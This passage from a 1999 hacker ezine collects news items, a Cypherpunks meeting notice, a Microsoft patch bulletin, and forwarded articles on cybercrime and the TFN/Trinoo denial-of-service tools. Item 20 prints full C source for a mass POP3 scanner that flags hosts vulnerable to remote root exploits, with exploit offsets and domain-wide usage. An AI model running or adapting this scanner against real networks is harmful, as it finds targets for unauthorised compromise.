http://digital-defiance.hypermart.net/zine.html
Hven ezine
http://www.hven.com.ve
@HWA
18.0 Digi.no publishes Script Kiddie Rant
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by aka
Respected online Norwegian news source Digi.no has
published an interview with a member of the group
"Hackers Online Norway" known as Spectom. The
interview claims that the group is planning to enter the
stock market and is looking for new members. Members
must pass a test of knowledge and break into a site for
membership. (It is unfortunate that a respected
magazine such as Digi.no would publish what appears to
be the rantings of a wannabe script kiddie.)
Digi.no - Norwegian
http://www.digi.no/digi98.nsf/pub/dd19991218113200TKW2126192111
Anyone want to send in a translation of this? - Ed
@HWA
19.0 w00w00 Con 1999
~~~~~~~~~~~~~~~
Contributed by Duro
w00giving99 is off to a great start. In case you haven't heard the w00
security development team is posting several vulnerabilities along with
exploit code. It is said that on the year 2k they are going to release their
best vulnerability along with the code to exploit it. The w00 team is up to #8
now. check out http://www.w00w00.org/advisories.html for all of the advisories.
The w00 team is doing this in the hopes that the vendors will fix the problem.
In the mean time script kids have fun!
w00w00 Site: http://www.w00w00.org/
@HWA
20.0 pops.c popmail scanner by duro
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* POPScan QPOP/UCB/SCO scanner by duro
duro@dorx.net
takes list of ip's from stdin
The hosts gathered by this scanner are
almost 100% vulnerable to a remote
root attack. The exploits used to root
the vulnerable machines can all be found by
searching bugtraq. UCB pop is 100% of the
time vulnerable to the qpop exploit (it's a very
old version of qpop). The QPOP version is
filitered to make sure that non-vulnerable
versions do not show up in the scan.
Common offsets for the bsd qpop exploit are:
621, 1500, 500, 300, 900, 0
Example usage:
./z0ne -o ac.uk | ./pops > ac.uk.log &
would scan ac.uk for vulnerabilities.
much help from jsbach
*/
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <signal.h>
int ADMtelnet (u_long, int port);
char domain[50];
int NUMCHILDREN = 150, currchilds = 0; /* change numchildren to taste */
char ip[16];
int temp1 = 0;
void scan(char *ip);
void alrm(void) { return; }
main()
{
while( (fgets(ip, sizeof(ip), stdin)) != NULL)
switch(fork()) {
case 0: {
scan(ip); exit(0);
}
case -1: {
printf("cannot fork so many timez@!@^&\n");
exit(0);
break;
}
default:
{
currchilds++;
if (currchilds > NUMCHILDREN)
wait(NULL);
break;
}
}
}
void scan(char *ip)
{
char printip[16];
struct sockaddr_in addr;
int sockfd;
char buf[512];
bzero((struct sockaddr_in *)&addr, sizeof(addr));
sockfd = socket(AF_INET, SOCK_STREAM, 0);
addr.sin_addr.s_addr = inet_addr(ip);
addr.sin_port = htons(110);
addr.sin_family = AF_INET;
signal(SIGALRM, alrm);
alarm(5);
if ( (connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) != -1))
{
recv(sockfd, (char *)buf, sizeof(buf), 0);
if ( (strstr(buf, "QPOP") ) != NULL && (strstr(buf, "2.5")) == NULL && (strstr(buf, "krb")) == NULL)
{
checkos(ip,1);
}
if((strstr(buf, "UCB")) != NULL)
checkos(ip,2);
if((strstr(buf, "SCO")) != NULL)
{
strcpy(printip, ip);
if ((temp1=strrchr(printip, '\n')) != NULL)
bzero(temp1, 1);
printf("%s: SCO Unix box running SCO pop.\n",printip);
}
}
return;
}
// }
checkos(char *ip, int spl)
{
int temp2;
char printip[16];
unsigned long temp;
temp = inet_addr(ip);
temp2 = ADMtelnet(temp, 23);
strcpy(printip, ip);
if ((temp1=strrchr(printip, '\n')) != NULL)
bzero(temp1, 1);
if ((temp2 == 1)&&(spl==1))
printf("%s: OpenBSD box running vuln QPOP\n",printip);
if ((temp2 == 1)&&(spl==2))
printf("%s: OpenBSD box running vuln UCB pop\n",printip);
if ((temp2 == 2)&&(spl==1))
printf("%s: FreeBSD box running vuln QPOP\n",printip);
if ((temp2 == 2)&&(spl==2))
printf("%s: FreeBSD box running vuln UCB pop\n",printip);
if ((temp2 == 3)&&(spl==1))
printf("%s: BSDi box running vuln QPOP\n",printip);
if ((temp2 == 3)&&(spl==2))
printf("%s: BSDi box running vuln UCB pop\n",printip);
}
int ADMtelnet (u_long ip, int port)
{
struct sockaddr_in sin;
u_char buf[4000];
int dasock, len;
int longueur = sizeof (struct sockaddr_in);
dasock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); /* gimme a socket */
sin.sin_family = AF_INET;
sin.sin_port = htons (port);
sin.sin_addr.s_addr = ip;
if (connect (dasock, (struct sockaddr *) &sin, longueur) == -1)
return (-1);
while (1)
{
memset (buf, 0, sizeof (buf));
if ((len = read (dasock, buf, 1)) <= 0)
break;
if (*buf == (unsigned int) 255)
{
read (dasock, (buf + 1), 2);
if (*(buf + 1) == (unsigned int) 253 && !(u_char) * (buf + 2));
else if ((u_char) * (buf + 1) == (unsigned int) 253)
{
*(buf + 1) = 252;
write (dasock, buf, 3);
}
}
else
{
if (*buf != 0)
{
bzero (buf, sizeof (buf));
read (dasock, buf, sizeof (buf));
usleep(40000);
if((strstr(buf, "OpenBSD") != NULL))
return 1;
if((strstr(buf, "FreeBSD") != NULL))
return 2;
if((strstr(buf, "BSDI") != NULL))
return 3;
sleep (1);
}
}
}
return 0;
}
@HWA
21.0 Cypherpunks meeting announcement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Join us for the first Cypherpunks meeting of the new millennium!
NEXT Meeting: <http://www.freedomfighter.net/cypherpunks/2000/0115.html>
Meeting Page: <http://www.freedomfighter.net/cypherpunks/physical.html>
SF Bay Area Cypherpunks (80th Chairborne Regiment)
15 Jan 2000 * MEETING PRE-ANNOUNCEMENT
The January 2000 SF Bay Cypherpunks meeting will be on January 15th!
General Info:
For those of you who plan ahead: the January 2000 cypherpunks
physical meeting will be on January 15th, the THIRD SATURDAY of
January, instead of the usual second Saturday. This will align
our meeting with the RSA Data Security Conference in San Jose
the following week (registration starts on 16 Jan). Many of the
usual cypherpunk suspects from around the planet will be in town.
Location:
The meeting will be held in San Jose, a few blocks from the RSA
conference site. Location details to follow.
Time:
Meeting time is 12-6pm, followed by a group dinner nearby from 6-8pm.
Speakers: (so far...)
Cypherpunk Projects: general "Works-in-Progress" session
Bruce Schneier (Counterpane)
Austin Hill (Zero Knowledge)
Paul Holman (Shmoo Group)
Adam Shostack (Zero Knowledge)
Mystery Guest
More Volunteer Speakers are welcome:
Send us your agenda proposal (one brief paragraph,
include amount of time needed, e.g. 5/15/30 minutes).
<mailto:sfbay-cpunks-announce-admin@cryptorights.org?subject=2000-01-15%20agenda%20request>
RSA Conference Vendor Expo Free Registration
The show floor will be open January 18th and 19th at the San Jose
Convention Center. Onsite Expo registration is $50, but it's FREE
if you register NOW at: <http://www.rsasecurity.com/rsa2000>.
Also, you can register for the conference or the IBM gala party
at that site.
@HWA
22.0 Microsoft security bulletin MS99-046 Windows NT 4.0 SP4 or SP5
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
Re-release of Microsoft Security Bulletin MS99-046
--------------------------------------------------
In November, we withdrew a previously released patch that improved the
randomness of TCP initial sequence numbers in Windows NT 4.0. The patch was
withdrawn because it contained the same regression error that was present in
Windows NT 4.0 SP6. We have eliminated the regression error and re-released
the patch. The security bulletin has been updated and is available at
http://www.microsoft.com/Security/Bulletins/ms99-046.asp; the FAQ also has
been updated and is available at
http://www.microsoft.com/Security/Bulletins/ms99-046faq.asp.
All versions of the original patch were affected by the regression error,
although the error only manifested itself in certain situations. When
applying the new patch, it's not necessary to uninstall the original patch
first. Just install the patch as normal. Here's how to determine which
patch to apply:
- If you are running Windows NT 4.0 SP4 or SP5 on an Intel machine, go
to http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16763 and
select q243835sp5i.exe.
- If you are running Windows NT 4.0 SP6 on an Intel machine, go to
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16764 and
select q243835i.exe.
- If you are running Windows NT 4.0 SP4 or SP5 on an Alpha machine, go
to http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16763 and
select q243835sp5a.exe.
- If you are running Windows NT 4.0 SP6 on an Alpha machine, go
to http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16764 and
select q243835a.exe.
We are very sorry for any inconvenience caused by the regression error, and
will do our best to prevent similar problems in the future. Regards,
The Microsoft Security Response Team
*******************************************************************
You have received this e-mail bulletin as a result of your registration
to the Microsoft Product Security Notification Service. You may
unsubscribe from this e-mail notification service at any time by sending
an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
The subject line and message body are not used in processing the request,
and can be anything you like.
For more information on the Microsoft Security Notification Service
please visit http://www.microsoft.com/security/services/bulletin.asp. For
security-related information about Microsoft products, please visit the
Microsoft Security Advisor web site at http://www.microsoft.com/security.
_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net
@HWA
23.0 [ISN] Hacker Shootouts?
~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: darek.milewski@us.pwcglobal.com
NETWORK WORLD FUSION FOCUS: JIM REAVIS on SECURITY
Today's Focus: Hacker shootouts? Not!
12/10/99
By Jim Reavis
I personally like the idea of companies sponsoring hacker challenges,
where a box is set up on the 'Net for ingenious hackers to test their
skills and win a prize. These challenges can be educational - for the
hacker, the sponsor and sometimes for the product vendors as well. I
would like to see more hacker challenges, bugs bounties and crypto
algorithm cracking contests.
However, it is completely irresponsible and unbelievable to see hacker
shootouts that pit one operating system against another. Such was the
case in September when PC Week Labs sponsored HackPCWeek.com, where a
Windows NT server was pitted against a Linux server in a test to find
which operating system was more secure. Unfortunately, these types of
shootouts serve only to obfuscate the real issues of operating system
security, confuse those trying to learn about the technical differences
between the operating systems and further polarize the proponents of Linux
and NT.
Four days after the challenge was initiated, the Linux system was
compromised by an add-on CGI script with improper security checks - not by
the core operating system. In providing an explanation of the hack, PC
Week Labs revealed that they did not install any of the 21 security
patches for Red Hat 6; however they did install Service Pack 5 for NT.
Their reasoning? It was too difficult to install the individual patches,
but Service Pack 5 comes in one easy file.
Their perverse reasoning could be described as defining deviancy down -
systems administrators must be lazy and sloppy so we will be sloppy as
well. PC Week Labs does not seem to be aware that service packs on NT are
not necessarily a systems administrator's paradigm. The service packs are
very famous for fixing some things, but breaking others; consequently,
many systems administrators are more comfortable staying behind a service
pack level and utilizing post-SP hotfixes to take a more targeted approach
to solving problems.
It is clear from PC Week Labs' explanation of their setup rationale that
service packs are an ideal service management solution - that would be
news even to many NT advocates. PC Week Labs is guilty of making unwise
generalizations about how either of the operating systems are or should be
securely implemented.
So what did PC Week Labs prove? As many veterans of the computer security
industry will say, you cannot prove security, only insecurity. Providing
total systems assurance is a complicated process that cannot be emulated
in a contest. When it comes to using any computer system for the purpose
of securing sensitive data, the contribution the technology makes to that
equation pales in comparison to the contribution the people must make.
People make the difference in information security, and a solitary
shootout will do more to establish the competency of the test developers,
not the products themselves. Unfortunately, HackPCWeek.com proved very
little.
What are good hacker challenges to conduct? Vendors that challenge
hackers to find flaws in their own products, or very specific algorithms,
are doing a positive thing. Microsoft, for one, should be applauded for
the Windows 2000 beta test site the firm ran on its own. This is a
terrific way to get the product out of their developers' and beta testers'
hands and into those with the talents to hack NT's vulnerabilities. We
only wish that this effort was more extensive and that Microsoft would
have offered nice rewards to successful participants.
Vulnerabilities found on a beta product in a hacker challenge are
vulnerabilities that won't show up in the released product. Code-breaking
challenges like RSA's Data Encryption Standard challenge are enormously
useful, as they give us concrete data on the amount of processing power
required to crack a widely used crypto algorithm. To be sure, vendors use
marketing spin to claim that their own hacker challenge has proven the
superiority of their own products, but we all know that vendors are
supposed to be biased, and we can filter out the noise. However, contests
from a presumably unbiased authority need to be much more carefully
constructed, and need to have objective goals. Computer magazines have
done competitive product reviews for a long time, and the accepted
protocol is to bend over backwards to be fair. Subjectively patching one
operating system, but not the other, is troubling and damaging to PC Week
Labs' credibility.
There are many IT decision makers who want to get to the facts about which
operating system they should be using now, and in the future. Facts are
sometimes hard to come by, and unfortunately, a hacker shootout does not
provide any facts. A hacker shootout serves only to further polarize the
respective NT and Linux camps. Ultimately, HackPCWeek.com appears to be a
base attempt to capitalize on the Linux-NT debate, without providing
something useful for IT decision makers.
I personally want to see more hacker challenges. Nothing would please me
more than to see talented hackers making a living off of these contests,
while we all learn from the results. What did we really learn from the
HackPCWeek.com exercise? If you are looking to hire a Linux administrator
and you receive a resume listing PC Week Labs as prior experience - you
might want to pass.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
FOR RELATED LINKS -- Click here for Network World's home page:
http://www.nwfusion.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Getting the drop on network intruders, Network World, 10/04/99
http://www.nwfusion.com/reviews/1004trends.html
Hacker alert, Network World, 09/27/99
http://www.nwfusion.com/buzz99/buzzintel.html
Defending against cyberattack, Network World, 08/23/99
http://www.nwfusion.com/news/1999/0823cyberattack.html
Start-up's 'decoy' server helps track down hackers, Network World,
08/09/99
http://www.nwfusion.com/archive/1999/72100_08-09-1999.html
Archive of Network World Fusion Focus on Security newsletters:
http://www.nwfusion.com/newsletters/sec/
Other security-related articles from Network World:
Viruses to crash New Year's bash: Remedies include shutting down e-mail
systems, Network World, 12/6/99
http://www.nwfusion.com/news/1999/1206y2k.html
Network World interview: Cisco's John Chambers, Network World, 12/6/99
http://www.nwfusion.com/news/1999/1206chambers.html
About the author
----------------
Jim Reavis, the founder of SecurityPortal.com
(http://securityportal.com/), is an analyst with over
10 years' experience consulting with Fortune 500 organizations on
networking and security-related technology projects.
Questions or comments?
----------------------
* For editorial comments, write Charley Spektor,
Managing Editor at: cspektor@nww.com
* For advertising information, write Jamie Kalbach,
Account Executive at: jkalbach@nww.com
* For all other inquiries, write Christine Rhoder,
Circulation Marketing Manager at: crhoder@nww.com
Subscription Services
---------------------
You can subscribe or unsubscribe to any of your e-mail newsletters by
updating your form at: http://www.nwfusion.com/focus/subscription.html
For subscription changes that cannot be handled via the web, please send
an email to our customer service dept: listnews@gaeta.itwpub1.com
Network World Fusion is part of IDG.net, the IDG Online Network.
IT All Starts Here: http://www.idg.net
Copyright Network World, Inc., 1999
----------------------------------------------------------------
The information transmitted is intended only for the person or entity to
which it is addressed and may contain confidential and/or privileged
material. Any review, retransmission, dissemination or other use of, or
taking of any action in reliance upon, this information by persons or
entities other than the intended recipient is prohibited. If you received
this in error, please contact the sender and delete the material from any
computer.
ISN is sponsored by Security-Focus.COM
@HWA
24.0 [ISN] 21 yr old secures $53Mil for high-tech startup
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.mercurycenter.com/svtech/news/breaking/merc/docs/004316.htm
PALO ALTO, Calif. (AP) [12.15.99] -- Angus Davis told his parents not
to worry when he was thrown out of the prestigious school Phillips
Academy Andover for hacking into the telephone system.
But even Davis couldn't have predicted that in less than five years he
would leverage his scofflaw talents to secure $53 million in funding
for a company trying to combine the power of the World Wide Web with
the convenience of the telephone.
On Wednesday Davis -- who is barely old enough to pop a bottle of
champagne -- announced that he and his partners a their company,
Tellme Networks Inc., have received $47 million in funding from rival
venture capital firms Benchmark Capital and Kleiner Perkins Caufield &
Byers. The new round of investment brings the company's total funding
to $53 million.
``It's a lot of money,'' said Davis, 21, perched on the bed he has
built above his desk. ``It's a testament to the importance of our
team.''
[...]
==
Some day, on the corporate balance sheet, there will be
an entry which reads, "Information"; for in most cases
the information is more valuable than the hardware which
processes it. -- Adm. Grace Murray Hopper, USN Ret.
==
http://www.dis.org/erehwon/
ISN is sponsored by Security-Focus.COM
@HWA
25.0 [ISN] Netscape Security Flaw Revealed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: "John Q. Public" <tpublic@dimensional.com>
http://www.zdnet.com/zdnn/stories/news/0,4586,2409537,00.html
By Sharon Cleary, WSJ Interactive Edition
December 15, 1999 5:50 AM PT
A software-security firm warned that its researchers have found a
potentially serious security flaw in the e-mail system used by Netscape's
Web browser.
Reliable Software Technologies, a Sterling, Va., software-security
company, said Tuesday that two RST engineers needed just eight hours to
duplicate the mathematical algorithm Netscape Mail uses to scramble users'
passwords. The company said the problem affects all current versions of
Netscape.
Gary McGraw, vice president for corporate technology at RST, said the
Netscape algorithm was "not an obvious sitting duck -- [the password]
appears to be scrambled up in a good way, but it's not cryptographically
strong." That would allow a determined hacker to reverse-engineer the
algorithm and figure out the password.
[...]
Officials of Netscape, now a division of Dulles, Va.-based America Online
Inc. (NYSE: AOL, were concerned by the news but said the unit has no plans
to change its algorithm. [sic, bad parens]
Chris Saito, the senior director for product management at Netscape, said
that the option to save a password locally was included for convenience.
Saito added that Netscape didn't use a stronger encryption algorithm to
protect passwords so that "computer experts could still access the
information, in case someone forgot their password."
[snip]
ISN is sponsored by Security-Focus.COM
@HWA
26.0 [ISN] Cyberterrorism hype
~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: Johan.Ingles@janes.co.uk
http://jir.janes.com/sample/jir0525.html
Document created: 21 OCTOBER 1999
Cyberterrorism hype
With the 1990s propensity to dot.com everything that moves, 'hacking' and
'cyberterrorism' have become subjects of intense media coverage. Almost
daily, hitherto unknown security specialists warn of potential
catastrophes: news that gets picked up by the media and crosses the globe
with impunity. Johan J Ingles-le Nobel discussed the subject with
programmers at Slashdot to profile so-called cyberterrorists and examine
the viability of cyberwarfare.
Cyberterrorism is a buzzword of 1999. Indeed, with the remarkable growth
of the Internet, hacking horror stories have reached new heights of
publicity, leading to a veritable media frenzy. Yet careful examination of
the issue reveals much of the threat to be unsubstantiated rumour and
media exaggeration. The exaggeration is understandable, however - these
technologies underpin our entire society, and what paper can resist
printing a scoop revealing that banks are being blackmailed with threats
of attacks on their computers, or that a military satellite has been
hijacked by hackers? The idea that an anonymous teenager working alone
from his bedroom can wreak electronic havoc on the far side of the world
makes for good press.
What is a hacker?
Nothing gets a hacker's back up quicker than someone confusing a hacker
with cracker. The term 'hacker' refers to an individual who programmes
enthusiastically (even obsessively), enjoys programming or is especially
good at programming; a 'cracker' is somebody who breaks into another's
computer systems or digs into their code (to make a copy-protected
programme run). Yet the boundaries have become somewhat blurred and the
popular understanding of these terms is is quite wrong: ever since
Hollywood produced 'Wargames', based on Kevin Mitnic's cracking activities
(known as 'exploits'), the term 'hacking' has become synonymous with
unauthorised access into restricted systems - which is 'cracking'. In
today's world, such activity also includes the deliberate defacement of
websites. Hackers are quick to point out that there is a code of hacker
ethics that precludes any profit from the activity - the only motive is
the activity itself - but they are not naïve: realising the potential for
misuse, they divide themselves into 'white-hat' hackers (ethical hackers)
and 'black-hat' hackers (crackers).
According to hackers, 99% of cracking incidents can be blamed on so-called
'script-kiddies'. These are usually young people who manage to acquire
some 'cracking tools' somewhere on the Internet and are keen try them.
They choose a 'cool' target (such as NASA, the Pentagon or the White
House) and launch the tools. Older, more established hackers see them as
upstarts. Think of a kid walking down a corridor testing doorknobs; whilst
they are more than capable of defacing websites such as that of the
Central Intelligence Agency (CIA), their actions are seen as the
equivalent of putting down a whoopie cushion on the chair of the UN
Secretary General - juvenile, noisy and somewhat embarrassing, but
ultimately without real effect. Says Mick Morgan, webmaster to the UK's
Queen Elizabeth: "I have nightmares about waking up to find graffiti
(which is all it is) on one of my customer's sites."
[snip..]
ISN is sponsored by Security-Focus.COM
@HWA
27.0 [ISN] The Beijing Hack Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.worldnetdaily.com/bluesky_exnews/19991216_xex_hack_planet.shtml
HONG KONG -- What do blondes, Jack in the Box tacos and 21st century
cyber-warfare have in common? Everything, apparently, if you're one of
the elite and stealthy soldiers in Hong Kong Blondes' computer hacking
universe.
These committed soldiers are locked in mortal combat with the
government of the People's Republic of China and the transnational
corporations who profit from dealing with it.
"Human rights are a global concern and we have no second thoughts
about attacking the multinational corporations who profit off of the
human rights abuses committed against our Chinese brothers and sisters
by their own government," says Databyte Cowgirl, one of the leaders of
the Hong Kong Blondes.
Along with numerous other members of the Hong Kong Blondes, Databyte
Cowgirl was interviewed by WorldNetDaily over the course of seven
weeks in July and August of 1999, as well as during the past several
weeks.
[...]
==
Some day, on the corporate balance sheet, there will be
an entry which reads, "Information"; for in most cases
the information is more valuable than the hardware which
processes it. -- Adm. Grace Murray Hopper, USN Ret.
==
http://www.dis.org/erehwon/
ISN is sponsored by Security-Focus.COM
@HWA
28.0 [ISN] Most cybercrime goes unpunished
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.ntsecurity.net/forums/2cents//news.asp?IDF=191
WINDOWS SECURITY NEWS 12/20/99
Most Cybercrime Goes Unpunished
Monday, December 13, 1999 - According to a recent article by David Noack,
most cybercrime goes unpunished. And based on the figures presented in
this report, we have to agree. the report states that of 419 cases of
alleged computer fraud referred to federal prosecutors in 1998, only 83
were prosecuted. The remainder were dismissed for lack of evidence. Also
in 1998, 47 people were convicted of federal computer crimes, and 20 were
sent to prison; another 10 were found not guilty.
Anyone who has glanced at the ATTRITION.ORG archives realizes that
these figures are pathetically low compared to the number of computer
crimes that actually occur every day. The report basically leads us to
assume most computer criminal are never reported to authorities--and
perhaps that's because most computer criminals never get caught.
Links: APB News
http://www.apbnews.com/newscenter/internetcrime/1999/12/09/cyberlaws1209_01.html?s=snaph
ISN is sponsored by Security-Focus.COM
@HWA
29.0 [ISN] Jubilant Zhirinovsky wants to hack Western computers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: "Vanna P. Rella" <vamprella@vamprella.com>
http://biz.yahoo.com/rf/991219/dy.html
Sunday December 19, 5:19 pm Eastern Time
Jubilant Zhirinovsky wants to hack Western computers
MOSCOW, Dec 20 (Reuters) - Russia's maverick politician Vladimir
Zhirinovsky, whose ultra-nationalist bloc looks set to do well in a
parliamentary election, said on Monday he would celebrate by hacking into
Western computers.
Zhirinovsky's bloc was running at more than eight percent in early results
compared with pre-election opinion polls which had given him some five
percent. Asked by Reuters whether he would have a drink to mark his
party's good showing, he said:
``No. No way, we Russians don't drink any more. We now work on computers,
we use computers to send viruses to the West and then we poach your
money.''
``We have the best hackers in the world. We do not need to drink or
smoke...We do not drink, smoke, have drugs and we don't have AIDS, that's
what you have got in the West.''
Russia is a heavy drinking nation which is struggling to catch up with
economically-advanced countries on the use of new technologies, such as
the Internet, but a lack of resources and poor infrastructure confines
progress to big cities.
Zhirinovsky who has run and done reasonably well in all parliamentary and
presidential elections since 1991 on a protest vote by lower stratas of
the Russian society, is one of the most eccentric politicians with an
acute political sense and bizarre sense of humour.
He has thrown juice at an opponent in a live televised debate, promised to
wash his boots in the Indian Ocean when Russia expands there and been
involved in fist-fighting in the State Duma lower chamber of parliament.
But at the same time, he has decided crucial votes in parliament in the
Kremlin's favour and has developed a well organised party with solid
assets.
ISN is sponsored by Security-Focus.COM
@HWA
30.0 [ISN] Tribe and Trinoo, two new virulent virii
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: "Noonan, Michael D" <mdn@intel.com>
http://news.cnet.com/news/0-1003-200-1501144.html?tag=st.ne.1002.tgif?st.ne.fd.gif.f
Computer security teams brace for attacks
By Stephen Shankland
Staff Writer, CNET News.com
December 20, 1999, 1:30 p.m. PT
Computer security teams are bracing for holiday attacks by two programs
that enlist multiple systems to launch coordinated assaults on Web
servers.
Concern is mounting that the two malicious programs, called Tribe Flood
Network and Trinoo, will show their colors in coming weeks. Experts fear
that the holidays are a likely time, because computer administrators on
vacation will be harder to locate and likely won't be paying as much
attention to systems under their control.
In addition, some suggest attackers are likely to strike in the midst of
confusion that people expect with the arrival of the Year 2000 computer
problem.
Tribe and Trinoo also may be more powerful than previous programs of the
same kind. The duo, which started appearing in recent months, "are a step
above what has happened before," according to Dave Dittrich, a computer
security technician at the University of Washington who wrote analyses of
the programs.
When installed onto hundreds or thousands of computers, the programs
simultaneously bombard a select point on the Internet. If the information
from the attackers comes fast enough, the target computer freezes up.
Flooding attacks such as Tribe and Trinoo are examples of so-called
denial-of-service attacks, a method that's been around as long as there
have been networks to inundate. And launching attacks from several
computers too has been tried before, for example with the "Smurf" attacks
of last year.
But Tribe and Trinoo give a new level of control to the attacker, and they
are being improved, Dittrich said.
Moreover, because the origin of the program is obscured, it's hard to
counteract, said Quinn Peyton of the Computer Emergency Response Team
(CERT) at Carnegie Mellon University.
"There are machines now sitting there, prepared to attack somebody else,"
Peyton said. "Now one person can do a massive denial-of-service."
CERT warns that the Trinoo and Tribe attack tools "appear to be undergoing
active development, testing and deployment on the Internet."
Tribe Flood Network and Trinoo launch their attacks from a host of
innocent computers that already have been broken into. Then, on a signal
from a master computer, the computers simultaneously bombard the victim
machine with packets of information so fast that it becomes unresponsive.
At that point, the target computer won't respond to commands and can't be
taken off the network.
To monitor computer attacks and vulnerabilities, the FBI in 1998 set up an
office called the National Infrastructure Protection Center (NIPC).
Although FBI officials did not comment on the Tribe or Trinoo attacks, the
FBI is holding a news conference tomorrow about Y2K issues, a spokesman
said.
"There's a lot of paranoia for the Y2K stuff," said David Crawford of the
Energy Department's Computer Incident Advisory Capability.
CIAC is working hard to prepare a description of how to identify Trinoo
and Tribe in the next few days. "We're looking for a unique signature that
will identify these types of attack," he said.
Dittrich might know. He had to respond when 27 computers at his university
were among 227 that attacked the University of Minnesota during three days
in August.
"I was having a hard time finding all the people and getting all the
systems cleaned up," he said, and that was just for the a small fraction
of the systems involved.
"During that time, their network was pretty much unusable for 100,000
users," Dittrich said. "There isn't much of a defense against these
denial-of-service attacks."
University of Washington computers also were used for attacks on computers
in France, Norway and Australia, he said.
The attack software was installed primarily on computers using Sun
Microsystems' Solaris and Linux--both variations of the Unix operating
system. To break into those computers, the intruder took advantage of
known vulnerabilities that allowed him or her to take almost complete
control of a computer then erase his or her tracks, Dittrich said.
"The core message is that people who have systems on the Internet need to
know how to deal with them," Dittrich said. "You can't expect your
computer to be running for years, like a microwave. It's more like a
really expensive car, where you've got to be taking it in for maintenance
all the time."
In the attack on the University of Minnesota, 114 of the 227 attacking
systems were part of the Internet 2, a higher-speed successor to the
current Internet. Using Internet 2 was important, because its higher-speed
network can deliver more volleys in the denial-of-service attack.
"Whoever has the bigger pipe wins," Dittrich said.
ISN is sponsored by Security-Focus.COM
@HWA
31.0 [ISN] As New Year nears, threat of Net attack program mounts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: darek.milewski@us.pwcglobal.com
As New Year nears, threat of Net attack program mounts
By Stephen Shankland
Staff Writer, CNET News.com
December 23, 1999, 4:00 a.m. PT
URL: http://news.cnet.com/category/0-1003-200-1504709.html
A new and potentially more dangerous version of an Internet attack program
has been posted just in time for the holidays, and another is on the way.
A new version of a malicious program called the Tribe Flood Network (TFN)
is more powerful and harder to detect than an earlier version, according
to experts. And an updated sister program called Trinoo is due to be
released next week.
Few incidences of their use have been publicly acknowledged, but experts
are warning sites to prepare against attacks that may coincide with New
Year's. Widely anticipated problems owing to the Y2K computer glitch may
provide cover for other mischief.
The program works like this: A TFN attacker secretly embeds software into
hundreds of computers. Then, at a selected time, a command is issued that
prompts the infected computers to swamp a target Web site or server with
messages in a method of attack called "denial of service." The program
doesn't damage the "infected" computers or the target, but the sudden
flood of messages typically knocks out the target system.
Although it's possible for target computers to protect themselves by
ignoring messages from attacking computers, it's hard to identify which
computers are attacking--especially when there are hundreds. This
fundamental vulnerability of networked computers makes protecting against
denial-of-service attacks extremely difficult.
The existence of TFN was reported earlier this week. The new variant,
called TFN2K, is potentially more dangerous in that it can enlist machines
based on both the Windows NT and Unix operating systems to deliver the
flood of messages, according to Gia Threatte of the Packet Storm Web site,
which publishes security-related software so system administrators can
protect against attacks and intrusions.
TFN2K also adds the ability to act on a single command, a stealthier mode
of operation than the previous version (which required the controller to
send a password), and encrypts communications, making the infecting
messages harder to detect, Threatte said.
Further, TFN2K sends decoy information to throw hunters looking for the
source off the scent.
The purported author of the TFN family, who goes by the name "Mixter,"
sent a version of TFN2K to Packet Storm. Packet Storm said it also expects
a new version of Trinoo from Mixter.
With the new software being released now and the "2K" allusion to the new
year in the name of the program, it appears that a computer attack could
occur during the holidays.
"I don't really think you're going to see any serious attacks using this
until New Year's," Threatte said. On Jan. 1, though, people likely will
try to "cause a little mischief," she said.
Other security watchers concur. The consensus of a Year 2000 bug workshop
at Carnegie Mellon University's Computer Emergency Response Team was that
"it is possible that intrusion attempts, viruses and other attacks will be
focused on the time around 01 January 2000 under cover of Y2K incidents,"
CERT said.
CERT has warned, "We are receiving reports of intruders compromising
machines and installing distributed systems used for launching
packet-flooding denial-of-service attacks." CERT said that attackers
generally gained unauthorized access to these computers through well-known
weaknesses, reinforcing the message that system administrators must stay
up-to-date on keeping their systems secure.
Detection of attacks and their ultimate source isn't easy. Trinoo and the
TFN family obscure the address of the actual attacker by hiding the person
in control behind two layers of computers. The attacker lays the
groundwork by breaking in to several computers, installing master software
on some and attack software on others. When it's time for the attack, a
message is sent to the master computers, which in turn is relayed to the
drone computers that do the attacking by flooding the target with
"packets" of information.
Compromised computers that can be infected with the attack software have
